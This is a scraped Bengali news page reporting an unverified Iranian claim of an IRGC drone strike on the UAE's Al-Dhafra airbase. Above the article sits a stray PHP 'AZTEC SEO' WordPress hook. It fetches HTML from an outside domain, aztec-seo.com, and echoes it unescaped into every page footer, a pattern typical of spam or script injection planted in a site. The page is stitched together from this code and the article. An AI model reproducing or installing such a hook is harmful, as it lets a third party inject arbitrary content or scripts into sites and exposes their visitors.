/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); আমিরাতের আল-ধাফরা ঘাঁটিতে ইরানের ড্রোন হামলার দাবি | Dhaka Sky News

সীমিতভাবে মধ্যপ্রাচ্য ফ্লাইট চালু

আগের সংবাদ

দেশে তেলের পর্যাপ্ত মজুত রয়েছে: জ্বালানিমন্ত্রী

পরের সংবাদ

আমিরাতের আল-ধাফরা ঘাঁটিতে ইরানের ড্রোন হামলার দাবি

অনলাইন ডেস্ক

প্রকাশিত: March 7, 2026 , 6:49 pm

ইরানের রেভোল্যুশনারি গার্ডস কোর (আইআরজিসি) নৌবাহিনী সংযুক্ত আরব আমিরাতের আল-ধাফরা বিমানঘাঁটিতে ড্রোন হামলা চালিয়েছে বলে দাবি করেছে ইরানি সংবাদমাধ্যম।
ইরানের আধা-সরকারি বার্তা সংস্থা তাসনিম নিউজ এজেন্সির প্রতিবেদনে বলা হয়, আমিরাতের আল-ধাফরা ঘাঁটি লক্ষ্য করে আইআরজিসি নৌবাহিনী ড্রোন হামলা চালায়। এতে একটি মার্কিন স্যাটেলাইট যোগাযোগ কেন্দ্র, আগাম সতর্কতা ব্যবস্থা এবং ফায়ার কন্ট্রোল রাডার ক্ষতিগ্রস্ত হয়েছে।
তবে এ তথ্য তাৎক্ষণিকভাবে স্বাধীনভাবে যাচাই করতে পারেনি আল-জাজিরা। এ ঘটনায় এখন পর্যন্ত সংযুক্ত আরব আমিরাতের পক্ষ থেকেও কোনো আনুষ্ঠানিক মন্তব্য পাওয়া যায়নি।